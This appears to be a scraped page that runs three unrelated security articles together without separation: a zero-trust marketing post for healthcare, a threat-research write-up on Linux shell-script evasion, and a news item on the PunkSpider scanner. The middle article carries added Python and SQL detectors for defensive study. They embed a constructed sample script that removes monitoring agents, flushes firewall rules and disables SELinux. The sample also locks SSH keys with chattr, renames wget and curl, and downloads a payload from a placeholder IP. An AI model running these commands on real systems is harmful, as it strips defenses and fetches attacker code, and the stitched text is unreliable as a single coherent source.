

Zero Trust For Healthcare Orgs Is Just What The Doctor Ordered

Whether it’s a ransomware attack, a data breach, or some other method that exposes and exploits private, sensitive, or proprietary data, 2021 is shaping up to be the “year of the breach,” with healthcare orgs among the prime targets. Last week, Humana became the latest healthcare org to fall victim to a cyberattack when hackers leaked the medical data of over 6,000 patients, acquired through a third-party app for Medicaid Advantage members and agents.
In the first half of 2021, 360 breaches exposed almost 23 million patient records, more than in any other six-month period since the US Department of Health and Human Services Office for Civil Rights (OCR) began keeping track. This shouldn’t come as a surprise, because healthcare organizations:

Manage and store lots of valuable data; vast amounts of it are shared among an increasing number of physical and virtual entities both inside and outside the organization’s IT network.
Maintain large, expanding third-party networks that can be exploited (physicians, researchers, business associates, insurers, payers, etc.).
Rely heavily on technology for virtual care, connected medical devices, diagnostics, and patient engagement.
Struggle to secure sensitive data as it flows between hospital clinical engineering/IT networks, clinician remote access points, virtual care platforms, third-party healthcare partners, and even patients’ home networks.

The considerable amount of data sprawled across the healthcare ecosystem with no one watching it, sitting on flat, vulnerable networks with poor access controls, has made healthcare low-hanging fruit for hackers who’d rather work smarter, not harder.
While there’s no single remedy, adopting Forrester’s Zero Trust strategy can help most healthcare delivery organizations. In our recently published report, The Zero Trust Security Architecture For Healthcare, my colleague Alla Valente and I discuss how the new risks of the post-COVID delivery model put Zero Trust front and center for healthcare delivery organizations. Among the recommendations are the need for an overarching security strategy, visibility into the risk associated with third-party data sharing relationships, and accelerating innovation without jeopardizing safety, privacy, and security.
If you are responsible for security at a healthcare provider and would like to learn more, please schedule an inquiry call with me or Alla today.


Six Malicious Linux Shell Scripts Used to Evade Defenses and How to Stop Them

Uptycs Threat Research outlines how malicious Linux shell scripts are used to cloak attacks, and how defenders can detect and mitigate them.

Siddartha Sharma and Adhokshaj Mishra
Evasion techniques date back to the early days of attacks, when base64 and other common encoding schemes were used to hide payloads. Today, attackers are adopting new Linux shell script tactics and techniques to disable firewalls and monitoring agents and to modify access control lists (ACLs).
In previous Uptycs Threat Research posts, we discussed the common Linux utilities that threat actors generally use in the attack chain. In this report, we highlight the defense evasion techniques that are common in malicious Linux shell scripts, and then outline how Uptycs spots and mitigates them.
In this post, we cover the following evasive shell-script techniques:

Uninstalling monitoring Agents
Disabling Firewalls and Interrupts
Disabling Linux Security Modules (LSMs)
Modifying ACLs
Changing Attributes
Renaming common Utilities

The hash 39ac019520a278e350065d12ebc0c24201584390724f3d8e0dc828664fee6cae will be used to demonstrate and explain these techniques.
Technique 1: Uninstalling monitoring Agents
Monitoring agents are software components that continuously watch process and network activity on a system. They also produce logs that aid incident investigation.
The malicious script, which we found in our in-house osquery-based sandbox, tries to:

Uninstall the cloud monitoring agent Aegis (Alibaba Cloud’s threat detection agent) and stop the Aliyun service.
Uninstall YunJing, a host security agent from Tencent.
Uninstall the BCM client management agent, which is generally installed on endpoints for risk mitigation.

Technique 2: Disabling Firewalls and Interrupts
Most systems and servers deploy a firewall as a defense mechanism. In the malicious script, the attackers disable the firewall, in this case ufw (Uncomplicated Firewall), as a defense evasion tactic. Along with that, they flush the iptables rules (iptables -F), because iptables is widely used to manage firewall rules on Linux systems and servers. Note that iptables -F without -t flushes only the chains of the default filter table (other tables need -t) and leaves each chain’s default policy in place. (see figure 2)

The attackers also disable the NMI (non-maskable interrupt) watchdog. A watchdog is a configurable timer mechanism that raises an interrupt when a given condition holds for a given time; the kernel’s NMI watchdog uses it to detect CPUs that have stopped responding (hard lockups) and, depending on configuration, to report the lockup or panic the machine, which would interrupt whatever is hogging the CPU. To evade this mechanism, the attackers turn the watchdog off with the sysctl command (kernel.nmi_watchdog=0) or by writing ‘0’ to /proc/sys/kernel/nmi_watchdog; either change lasts only until reboot unless it is also persisted in sysctl.conf. (see figure 3)

Technique 3: Disabling Linux Security Modules (LSMs)
The malicious shell script also disables Linux Security Modules (LSMs) such as SELinux and AppArmor. These modules implement mandatory access control (MAC) policies; a server administrator can configure them to give users only restricted access to the applications installed or running on the system.
AppArmor is a Linux security feature used to confine applications such as Firefox for increased security. In Ubuntu’s default configuration, a user can restrict a given application by loading a profile that grants it only limited permissions.

SELinux is another Linux security feature, by which a security administrator can apply a security context to particular applications and utilities. On some web servers the shell is disabled or restricted, so to achieve remote code execution (RCE) adversaries usually bypass or disable SELinux first:

Technique 4: Modifying ACLs
ACLs, or access control lists, contain the rules by which permissions on files and utilities are granted. Filesystem ACLs tell the operating system which users may access a given file and what operations they are allowed. The setfacl utility in Linux is used to modify or remove ACL entries; in the script, setfacl is used to set permissions on chmod for a user:

Technique 5: Changing Attributes
chattr in Linux is used to set or clear certain file attributes (more on the chattr utility here). Adversaries use it on the files they drop, or on files they want to protect, making them immutable (+i) or append-only (+a) so that a user, even root, cannot modify or delete them without first clearing the attribute:

Another scenario:

Technique 6: Renaming common Utilities
One of the malicious scripts (d7c4693f4c36d8c06a52d8981827245b9ab4f63283907ef8c3947499a37eedc8) also contained the common utilities wget and curl invoked under different names. These utilities are generally used to download files from a remote IP, and attackers use them to fetch malicious files from their C2. Security solutions whose detection rules match the exact names of the utilities may not trigger on the download event if wget or curl run under a different name.
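As an added illustration (not code from the Uptycs post or its sandbox), the following Python scanner applies one rule per technique above to the text of a shell script and follows mv/cp renames of wget and curl, so that a later call under the new name is still flagged. The script it scans is a constructed sample that mimics the commands described, not the sample referenced by hash; the agent paths, the IP address and the file names in it are placeholders.

```python
import re
import shlex
from collections import defaultdict

# Constructed sample, written to mimic the six techniques described above.
# It is NOT the script referenced by hash in the post; paths, the IP and the
# file names are placeholders.
SAMPLE_SCRIPT = r"""#!/bin/bash
# T1: remove cloud monitoring agents
/usr/local/aegis/uninstall.sh
systemctl stop aliyun.service
/usr/local/qcloud/YunJing/uninst.sh
# T2: firewall and NMI watchdog
ufw disable
iptables -F
sysctl -w kernel.nmi_watchdog=0
echo 0 > /proc/sys/kernel/nmi_watchdog
# T3: LSMs
setenforce 0
systemctl stop apparmor
# T4 / T5: ACLs and attributes
setfacl -m u:www-data:rwx /bin/chmod
chattr +ia /root/.ssh/authorized_keys2
# T6: rename the downloaders, then use them under the new names
mv /usr/bin/wget /usr/bin/good
cp /usr/bin/curl /tmp/.x
good -q http://198.51.100.7/payload.sh -O /tmp/p.sh
/tmp/.x -s http://198.51.100.7/c2 -o /tmp/c
"""

DOWNLOADERS = {"wget", "curl"}

# One regex per technique; tune these to your environment before relying on them.
RULES = [
    ("T1 uninstall monitoring agent", r"(?i)\b(aegis|yunjing|aliyun|bcm)\b"),
    ("T2 disable firewall/watchdog",
     r"\bufw\s+disable\b|\biptables\s+(-F|--flush)\b"
     r"|nmi_watchdog\s*=\s*0|>\s*/proc/sys/kernel/nmi_watchdog"),
    ("T3 disable LSM",
     r"\bsetenforce\s+0\b|\b(systemctl|service)\s+.*apparmor|SELINUX=disabled"),
    ("T4 modify ACL", r"\bsetfacl\b"),
    ("T5 change attributes", r"\bchattr\s+\+\S*[ia]"),
]


def _basename(token: str) -> str:
    return token.rsplit("/", 1)[-1]


def scan_script(script: str) -> dict:
    """Map each technique found to the script lines that triggered it.

    Renamed downloaders are resolved by following mv/cp commands whose source
    is wget or curl, so a later call under the new name is still reported.
    """
    hits = defaultdict(list)
    aliases = {}  # new basename -> original utility
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for name, pattern in RULES:
            if re.search(pattern, line):
                hits[name].append(line)
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: fall back to a plain split
            argv = line.split()
        if not argv:
            continue
        cmd = _basename(argv[0])
        if cmd in ("mv", "cp") and len(argv) >= 3:
            src, dst = _basename(argv[-2]), _basename(argv[-1])
            if src in DOWNLOADERS:
                aliases[dst] = src
                hits["T6 rename common utility"].append(line)
        elif cmd in aliases:
            hits["T6 renamed utility used"].append(f"{line}  # {cmd} is {aliases[cmd]}")
    return dict(hits)


if __name__ == "__main__":
    for technique, lines in scan_script(SAMPLE_SCRIPT).items():
        print(technique)
        for entry in lines:
            print("   ", entry)
```

The rename tracking is the part worth keeping: a rule that only knows the string "wget" never sees the download on the last two lines, while following the mv/cp edges attributes them back to the original utility.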

Uptycs EDR Detections
Uptycs EDR, armed with YARA process scanning, detected these malicious scripts with a threat score of 10/10.

Uptycs EDR Queries
Alongside the detections, Uptycs EDR also records all of the events mentioned above in the process_events table. Using the queries below, incident response analysts can quickly identify such malicious events:
Firewall disabling
select * from process_events where exe_name = 'ufw';
ACL modification
select * from process_events where exe_name = 'setfacl';
Chattr utility usage
select * from process_events where exe_name = 'chattr' and cmdline = 'chattr +ia /home/hilde/.ssh/authorized_keys2';
This query matches the exact command line from the sample, which makes an SSH authorized_keys2 file immutable and append-only. To catch the same technique against other files, match on the attribute flag rather than the path, e.g. cmdline like '%chattr +%'.
Checking renamed common utilities (wget, curl)
select * from process_events where exe_name = 'mv';
Note that this returns every mv invocation on the host. Narrowing it with cmdline like '%wget%' or cmdline like '%curl%' surfaces only renames of the downloaders, and cp should be checked the same way, since a copy under a new name evades name-based rules just as well.
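The queries above are written against Uptycs’ process_events table. As an added example (not part of the Uptycs post), the script below loads a handful of constructed process events into an in-memory SQLite table with the columns those queries use (osquery’s SQL is itself SQLite, so the predicates carry over unchanged) and runs tightened versions of them: each hunt keys on exe_name plus a cmdline predicate, the mv/cp hunt follows the rename to catch the later execution under the new name, and broad_vs_narrow shows how exe_name = 'mv' alone sweeps in benign moves while missing the cp. The pids, paths and command lines are made up.

```python
import sqlite3

SCHEMA = """CREATE TABLE process_events (
    pid INTEGER, exe_name TEXT, path TEXT, cmdline TEXT)"""

# Constructed events, benign and malicious mixed; pids, paths and command
# lines are made up for the example.
EVENTS = [
    (1001, "ufw", "/usr/sbin/ufw", "ufw status"),
    (1002, "ufw", "/usr/sbin/ufw", "ufw disable"),
    (1003, "iptables", "/usr/sbin/iptables", "iptables -F"),
    (1004, "sysctl", "/usr/sbin/sysctl", "sysctl -w kernel.nmi_watchdog=0"),
    (1005, "setenforce", "/usr/sbin/setenforce", "setenforce 0"),
    (1006, "setfacl", "/usr/bin/setfacl", "setfacl -m u:www-data:rwx /bin/chmod"),
    (1007, "chattr", "/usr/bin/chattr", "chattr +ia /home/hilde/.ssh/authorized_keys2"),
    (1008, "chattr", "/usr/bin/chattr", "chattr -i /etc/resolv.conf"),
    (1009, "mv", "/usr/bin/mv", "mv /var/log/app.log /var/log/app.log.1"),
    (1010, "mv", "/usr/bin/mv", "mv /usr/bin/wget /usr/bin/good"),
    (1011, "cp", "/usr/bin/cp", "cp /usr/bin/curl /tmp/.x"),
    (1012, "good", "/usr/bin/good", "good -q http://198.51.100.7/p.sh -O /tmp/p.sh"),
    (1013, "mv", "/usr/bin/mv", "mv /tmp/build /opt/build"),
]

# Tightened versions of the post's queries: exe_name alone is too broad for
# ufw and mv, so each hunt also constrains the command line.
HUNTS = {
    "firewall disabled": """
        SELECT pid, cmdline FROM process_events
        WHERE (exe_name = 'ufw' AND cmdline LIKE '%disable%')
           OR (exe_name = 'iptables' AND (cmdline LIKE '% -F%' OR cmdline LIKE '%--flush%'))
        ORDER BY pid""",
    "nmi watchdog disabled": """
        SELECT pid, cmdline FROM process_events
        WHERE exe_name = 'sysctl' AND cmdline LIKE '%nmi_watchdog=0%' ORDER BY pid""",
    "lsm disabled": """
        SELECT pid, cmdline FROM process_events
        WHERE (exe_name = 'setenforce' AND cmdline LIKE '% 0')
           OR (exe_name IN ('systemctl', 'service') AND cmdline LIKE '%apparmor%')
        ORDER BY pid""",
    "acl modified": "SELECT pid, cmdline FROM process_events WHERE exe_name = 'setfacl' ORDER BY pid",
    "ssh key locked with chattr": """
        SELECT pid, cmdline FROM process_events
        WHERE exe_name = 'chattr' AND cmdline LIKE '%chattr +%'
          AND cmdline LIKE '%authorized_keys%' ORDER BY pid""",
    "downloader renamed": """
        SELECT pid, cmdline FROM process_events
        WHERE exe_name IN ('mv', 'cp')
          AND (cmdline LIKE '%/wget %' OR cmdline LIKE '%/curl %') ORDER BY pid""",
}


def load_events() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO process_events VALUES (?, ?, ?, ?)", EVENTS)
    return conn


def run_hunts(conn: sqlite3.Connection) -> dict:
    """Run every hunt and return {hunt name: [matching pids]}."""
    results = {name: [pid for pid, _ in conn.execute(sql)] for name, sql in HUNTS.items()}
    # Follow each rename: the destination basename is the new exe_name to hunt
    # for, which is how the later download under the new name is caught.
    new_names = [cmdline.split()[-1].rsplit("/", 1)[-1]
                 for _, cmdline in conn.execute(HUNTS["downloader renamed"])]
    if new_names:
        marks = ",".join("?" * len(new_names))
        results["renamed downloader executed"] = [
            pid for (pid,) in conn.execute(
                f"SELECT pid FROM process_events WHERE exe_name IN ({marks}) ORDER BY pid",
                new_names)]
    return results


def broad_vs_narrow(conn: sqlite3.Connection) -> tuple:
    """Contrast the post's exe_name = 'mv' query with the cmdline-aware hunt."""
    broad = {pid for (pid,) in conn.execute(
        "SELECT pid FROM process_events WHERE exe_name = 'mv'")}
    narrow = set(run_hunts(conn)["downloader renamed"])
    return broad, narrow


if __name__ == "__main__":
    db = load_events()
    for hunt, pids in run_hunts(db).items():
        print(f"{hunt:30s} {pids}")
    print("broad/narrow rename hunt:", broad_vs_narrow(db))
```

The second pass in run_hunts is the point of the example: once a rename of wget or curl is seen, the destination name is itself an indicator, and querying for it turns a name-blind download into a hit.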
As attackers use more sophisticated and novel evasion methods, it becomes increasingly important to monitor and record the activity on a system. Uptycs EDR offers the added benefit of a deep dive into the logged events, providing more insight into an attack: because it records everything that happens on the system, the evidence is there when an analyst needs it.
We recommend the following measures:

Regularly monitor for suspicious processes, events, and network traffic spawned by the execution of any untrusted binary.
Keep systems and firmware updated with the latest releases and patches.





Reboot of PunkSpider Tool at DEF CON Stirs Debate

Researchers plan to introduce a revamp of PunkSpider, which helps identify flaws in websites so companies can make their back-end systems more secure, at DEF CON.

Researchers will release a reboot of a controversial tool that crawls the web to identify back-end vulnerabilities in websites in the hopes that companies will quickly fix them and reduce security risks.
However, experts have mixed feelings about the tool called PunkSpider, created by the analytics firm QOMPLX. They fear the tool could be hijacked by hackers to exploit vulnerabilities before companies have time to patch them.
Alejandro Caceres, director of computer network exploitation at QOMPLX, and hacker Jason Hopper will introduce a revamped version of PunkSpider at the upcoming DEF CON gathering next week. QOMPLX cited the rise of ransomware as one of the reasons for a reboot of PunkSpider, which provides “a simple and massively scalable monitoring tool that quickly identifies gaps in collective defenses by highlighting which websites can easily fall prey to attackers,” according to a press release. The tool can provide internet users and the cyber community a “shared perspective” on the specific dangers of the web, the company said.
“We want everyone to be able to answer a simple question: how dangerous is the internet I use?” Jason Crabtree, CEO of QOMPLX, said in a press statement. “Our extensive research revealed a large but unfortunately not surprising number of basic vulnerabilities across the web. The common exploits that PunkSpider detects serve as a key proxy for risk overall, and frankly if website owners are not fixing the fundamentals it’s unlikely they’re fully addressing bigger vulnerabilities.”
Back by Popular Demand?
Caceres and Hopper said demand was another reason to update and reintroduce the tool after a years-long hiatus, adding that myriad issues and negative attention forced the tool, originally funded by the Defense Advanced Research Projects Agency, into hibernation.
“We’ve been getting asked a lot for ‘that tool that was like Shodan but for web app vulns,’” they wrote in a write-up for their session at DEF CON. “PunkSpider … was taken down a couple of years ago due to multiple … issues and threats. We weren’t sure in which direction to keep expanding, and it ended up being a nightmare to sustain.”
The new and improved PunkSpider is a “completely re-engineered” system that also expands the capabilities of the tool to find vulnerabilities, they wrote.
“It is not only far more efficient with real-time distributed computing and checks for way more vulns, we [also] had to take some creative ways through the woods,” Caceres and Hopper wrote.
The new tool in fact will have its own dedicated ISP and data center in Canada to integrate “freely available data that anyone can get but most don’t know is available,” they said. The data they refer to will be a massive collection of known web vulnerabilities.
Caceres and Hopper also plan to release tens of thousands of vulnerabilities at the conference and will ask for suggestions about what to search for to uncover even more.
Circa 2017: This message greeted visitors to PunkSpider’s website, promoting version 3.0 of its offensive cybersecurity testing tool.
Bug Bounty Bonanza?
As its creators know well, not everyone is thrilled about PunkSpider’s comeback, however.
In comments emailed to Wired, Electronic Frontier Foundation analyst Karen Gullo said that while the folks behind PunkSpider have “good intentions,” making the vulnerabilities public could backfire and have the opposite effect that its creators intended.
“Making them public might be the thing that pushes administrators to fix [these vulnerabilities]. But we don’t recommend it,” she told Wired. “Bad actors can exploit the vulnerabilities faster than administrators can plug them, leading to more breaches.”
And while many on Twitter have voiced support for the tool—with cybersecurity expert Stephen Frei observing that “you can’t manage what you can’t measure”– critics also took to the social-media platform to express consternation about PunkSpider.
One suggested that it may limit the opportunity for ethical hackers to win rewards for finding vulnerabilities that companies currently give them. “Ok so maybe I’m dumb but doesn’t a tool like this make bug bounties pointless?” questioned Twitter user @thedragonisreal.
A reply to the tweet countered that PunkSpider certainly won’t pick up every vulnerability, so there will still be plenty for ethical hackers and researchers to dig up and submit to companies’ vulnerability-reward programs.
Another Twitter user raised an ethical issue with the tool, suggesting it is needlessly calling out site insecurities without proof that companies respond accordingly and make necessary changes to protect themselves.
“Not sure if exposing sites like this is a good idea without data showing it lead to meaningful changes the first time around,” tweeted a user called @cypnk who is in the medical hardware industry. “If it didn’t, then it’s needlessly malicious.”